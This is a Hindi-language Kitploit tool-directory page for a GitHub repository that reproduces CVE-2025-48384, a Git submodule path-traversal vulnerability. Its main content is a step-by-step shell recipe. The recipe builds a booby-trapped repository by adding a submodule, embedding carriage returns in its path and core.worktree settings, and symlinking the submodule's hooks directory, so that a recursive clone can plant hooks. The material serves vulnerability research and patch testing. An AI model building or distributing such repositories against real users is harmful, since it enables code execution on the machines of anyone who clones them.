Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-48384-test — CVE-2025-48384 का पुनरुत्पादन, जो Git सबमॉड्यूल पाथ ट्रैवर्सल भेद्यता को प्रदर्शित करता है, एक्सप्लॉइट को दोबारा बनाने के लिए चरण-दर-चरण कमांड के साथ। | Kitploit
उपकरण/GitHubGitHub/beishanxueyuan/cve-2025-48384-test
भेद्यता विश्लेषणकोड विश्लेषणशोषणआपूर्ति श्रृंखला सुरक्षा
GitHubbeishanxueyuan/cve-2025-48384-test

CVE-2025-48384-test

CVE-2025-48384 का पुनरुत्पादन, जो Git सबमॉड्यूल पाथ ट्रैवर्सल भेद्यता को प्रदर्शित करता है, एक्सप्लॉइट को दोबारा बनाने के लिए चरण-दर-चरण कमांड के साथ।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

कमांड लाइन पुनः प्रस्तुत करें

root@kitploit:~
git clone --recursive https://github.com/beishanxueyuan/CVE-2025-48384-test.git

संशोधित Git रिपॉजिटरी को इंगित करें

root@kitploit:~
git init repo
git -C repo -c protocol.file.allow=always submodule add https://github.com/beishanxueyuan/CVE-2025-48384.git sub
git -C repo mv sub $(printf "sub\r")

git config unset -f repo/.gitmodules submodule.sub.path
printf "\tpath = \"sub\r\"\n" >> repo/.gitmodules

git config unset -f repo/.git/modules/sub/config core.worktree
printf "[core]\n\tworktree = \"../../../sub\r\"\n" >> repo/.git/modules/sub/config

ln -s .git/modules/sub/hooks repo/sub
git -C repo add -A
git -C repo commit -m submodule

cd repo/

git branch -M main
git remote add origin https://github.com/beishanxueyuan/CVE-2025-48384-test.git
टूल डाउनलोड करें